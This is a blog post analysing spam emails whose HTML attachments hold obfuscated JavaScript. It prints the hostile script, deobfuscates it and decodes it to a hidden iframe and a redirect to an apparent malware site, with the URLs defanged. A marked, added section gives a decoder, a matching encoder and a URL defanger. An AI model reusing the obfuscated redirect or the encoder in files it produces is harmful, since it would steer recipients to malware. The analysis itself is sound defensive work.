Looking At Obfuscated Javascript Spam
The typical Gentoo developer tends to get a lot of email, and that usually means a lot of spam. Today a massive amount of nasty spam messages arrived in my inbox; sadly, none of them were caught by any SpamAssassin instance on the way there:
Subject: notes from last week
Date: Mon, 20 Sep 2010 10:57:09 -0600
Attached are notes from last week. Let me know if there are any errors or major omissions. Thanks.
[77476Officers Meeting.html text/html (649 bytes)]
So I had 25 emails, each with around 650 bytes of HTML attached, all escaping the spam filters. Okay, you caught my attention, stop sending emails already. Let's see:
<script language="JavaScript" type="text/javascript">function p2gd(wja8){var
jty7,lwpr="",uuar="qhliu-t\"x=; o/>.n0egc:pmsvafr<",ss0n,gpck,x4ab=uuar.length;eval(unescape("%66un%63ti%6Fn v%79dc%28cm%798){%6Cwp%72+=%63my8%7D"));for(jty7=0;jty7<wja8.length;jty7++){gpck=wja8.charAt(jty7);ss0n=uuar.indexOf(gpck);if(ss0n>-1){ss0n-=(jty7+1)%x4ab;if(ss0n<0){ss0n+=x4ab;}vydc(uuar.charAt(ss0n));}else{vydc(gpck);}}eval(unescape("%64oc%75me%6Et.w%72it%65(l%77pr)%3Blw%70r=%22%22;"));}p2gd("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Oh, lots of obfuscated code. Especially interesting is the JavaScript. After properly indenting it and renaming the variables to something meaningful, you get this:
function func_1(param) {
    var i,
        output = "",
        str1 = "qhliu-t\"x=; o/>.n0egc:pmsvafr<",   // the 30-character alphabet (the "key")
        str1_position,
        param_char,
        str1_length = str1.length;
    function add_to_output(str) {               // was eval(unescape(...));
        output += str;
    }
    for (i = 0; i < param.length; i++) {
        param_char = param.charAt(i);
        str1_position = str1.indexOf(param_char);
        if (str1_position > -1) {
            // shift backwards by (i+1) mod 30, wrapping around the alphabet
            str1_position -= (i + 1) % str1_length;
            if (str1_position < 0) {
                str1_position += str1_length;
            }
            add_to_output(str1.charAt(str1_position));
        } else {
            add_to_output(param_char);          // characters not in str1 pass through unchanged
        }
    }
    document.write(output);                     // was eval(unescape(...));
    output = "";
}
func_1("qv:;h0x>.lnq/ee av0xec eaixe n\"cg;>/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-\"");
What you can see is a function func_1 that is called with a string that looks like gibberish as its parameter (the last line of the listing).
The function then iterates over every character in that string (the for loop), does some magic to select a certain character from str1 or param,
and then adds it to the output variable (one of the two add_to_output calls).
Looking at that character selection algorithm, you can see that it first checks whether the current character from param is included in str1.
If that is the case, it picks one character from str1, following the calculation str1_position -= (i + 1) % str1_length, wrapping around if the result is negative.
I'm not a crypto expert, but I think that snippet is similar to a polyalphabetic cipher
like the Vigenère cipher. The modulo used in the calculation wraps the key (str1) so that it matches the length of param.
So it generates a string and then writes it into the document, thus making the browser parse it (the document.write call).
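To see what document.write receives without loading the attachment in a browser, here is the same transform as a pure function, together with its inverse and a small URL extractor that defangs whatever it finds. This is an added example, not the spammer's script or anything from the original post; ALPHABET, PAYLOAD, decode, encode and extractDefangedUrls are names chosen here. Run on the string from the mail it returns a single <meta http-equiv="refresh"> tag, the first hop of the redirect chain.

```javascript
const ALPHABET = 'qhliu-t"x=; o/>.n0egc:pmsvafr<';   // str1 from the mail: 30 chars, all the markup needs

// Same transform as func_1 above, but returns the generated markup instead of
// writing it into the document (names here are chosen for this example).
function decode(payload, alphabet = ALPHABET) {
  const n = alphabet.length;
  let out = '';
  for (let i = 0; i < payload.length; i++) {
    const pos = alphabet.indexOf(payload[i]);
    if (pos === -1) { out += payload[i]; continue; }  // not in the alphabet: passes through
    // shift backwards by (i+1) mod n, wrapping around the alphabet
    out += alphabet[(pos - (i + 1) % n + n) % n];
  }
  return out;
}

// Inverse: shift forwards by the same position-dependent amount. Round-tripping
// shows the whole "key" is the alphabet plus the character's position.
function encode(plain, alphabet = ALPHABET) {
  const n = alphabet.length;
  let out = '';
  for (let i = 0; i < plain.length; i++) {
    const pos = alphabet.indexOf(plain[i]);
    out += pos === -1 ? plain[i] : alphabet[(pos + (i + 1) % n) % n];
  }
  return out;
}

// Pull URLs out of the generated markup and defang them (http -> hXXp), so the
// result can go into a triage note without becoming a clickable link.
function extractDefangedUrls(markup) {
  const urls = markup.match(/https?:\/\/[^\s"'<>]+/g) || [];
  return urls.map(u => u.replace(/^http/, 'hXXp'));
}

// The argument passed to func_1 in the attachment, copied from the mail above.
const PAYLOAD = 'qv:;h0x>.lnq/ee av0xec eaixe n"cg;>/se/x/:>c:xxhla=c e:.vhafuxuate/csqm-apq0m :fl-"';

if (typeof require !== 'undefined' && require.main === module) {
  const markup = decode(PAYLOAD);
  console.log(markup);                       // the <meta http-equiv="refresh"> tag
  console.log(extractDefangedUrls(markup));  // where it sends the victim, defanged
}
```

Swapping ALPHABET and the payload for those of another sample of the same family is enough to triage it the same way.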
Cutting the long story short
The string it generates is sadly quite boring...
I used a website called jsunpack to see the generated code; you might as well have replaced the document.write with alert(), but meh.
Here's the text:
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=hXXp://scaner-high.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="hXXp://finwizonline.com/news/"></iframe>
It renders an iframe that links to a PHP script, which is likely a "how many people clicked this" counter, and redirects people to that website after four seconds to ensure they have been counted.
That /news/ website again redirects to another website which is no longer available. :(
At least a Google search suggests that this site hosts malicious content, Windows trojans specifically.
*yawn*
So, nothing to fear for us Linux people. It started out quite interesting, but besides an interesting obfuscation method, there were no fancy exploits to find.
I'll go set up a SpamAssassin rule to finally get rid of these messages now. *sigh*